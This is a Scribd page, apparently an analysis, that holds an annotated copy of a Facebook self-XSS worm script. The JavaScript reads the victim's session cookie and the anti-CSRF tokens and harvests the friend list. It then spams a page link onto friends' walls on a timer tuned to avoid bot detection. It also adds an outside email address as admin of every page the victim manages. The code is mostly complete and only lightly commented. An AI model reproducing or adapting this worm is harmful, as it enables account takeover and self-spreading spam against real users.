0 penilaian0% menganggap dokumen ini bermanfaat (0 suara)
14 tayangan3 halaman
This one collects cookie as well as the personalized status update email address. It seems it adds as admin of all pages the user holds. / / end of function to change the admins.
This one collects cookie as well as the personalized status update email address. It seems it adds as admin of all pages the user holds. / / end of function to change the admins.
Hak Cipta:
Attribution Non-Commercial (BY-NC)
Format Tersedia
Unduh sebagai TXT, PDF, TXT atau baca online dari Scribd
This one collects cookie as well as the personalized status update email address. It seems it adds as admin of all pages the user holds. / / end of function to change the admins.
Hak Cipta:
Attribution Non-Commercial (BY-NC)
Format Tersedia
Unduh sebagai TXT, PDF, TXT atau baca online dari Scribd
txt = "Hey All Join This Page http://www.facebook.com/pages/I-Love-You/17481092
5876826"; txtee = "Hey All Join This Page http://www.facebook.com/pages/I-Love-You/174810 925876826"; alert("Your Invites has been sent!."); with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function ( ) { if (x.readyState == 4 && x.status == 200) { z=x.responseText; //comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1 ]; // comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\ w]+)"/i)[1]; form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1]; dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1]; pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () { //extracts list of friends if (xx.readyState == 4 && xx.status == 200) { m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/ (\/\d+_|_\d+_q\.jpg)/gi, "").split("\n"); //facebook returns list of friends images of the form of three numbers s eparated by _, //the above regular expression extracts out the middle of the two //(which infact is the userID of friend) i = 0; llimit=25; t = setInterval(function () { if (i >= llimit ) return;//it seems the limit is 25 posts per 2 seconds on facebook (t o be counted as bot) if(i == 0) {//do it only once with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/m anage_pages.php?__a=1&__d=1"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function() { if(ddddd.readyState == 4 && ddddd.status == 200) { llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length; j=0; for(j=0;j<len;j++) { with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit /?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"), setRequestHeader("Content-Type", "application/x-www-form- urlencoded"), send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+ll m[j].replace(/\\"id\\":/i, "")+ "&friendselector_input%5B%5D=tawil%40live.com%09&fri end_selected%5B%5D=&save=1"); //I am not very sure on this one but it seems it adds as admin of all pages the user holds } } }, send(null); //end of function to change the admins
// this one collects cookie as well as the personalized status
update email address // (a photo sent to that address is posted on the wall directl y)
//following code does status update
//the code writes message represented by txt and txtee alternately o n the wall of friends. //txt and txtee are same though (may be author's mistake) if(i%2==0) { with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.p hp?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlenco ded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match (/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + //m is an array of id of friends (was created early in the scrip t exec), choose a random friend "&composer_id=" + "&hey_kid_im_a_composer=true&display_context=profile&post_form_i d=" +form + "&fb_dtsg=" + dt + //comp, form, dt are (probably) XSRF prevention tokens "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_sourc e=AsyncRequest"); } else { with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.p hp?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urle ncoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.ma tch(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+ "&hey_kid_im_a_composer=true&display_context=profile&pos t_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_ id_source=AsyncRequest"); } i += 1; }, 2000);// 2000 milli-sec window, after which the script is executed ag ain } }, send(null); } }, send(null);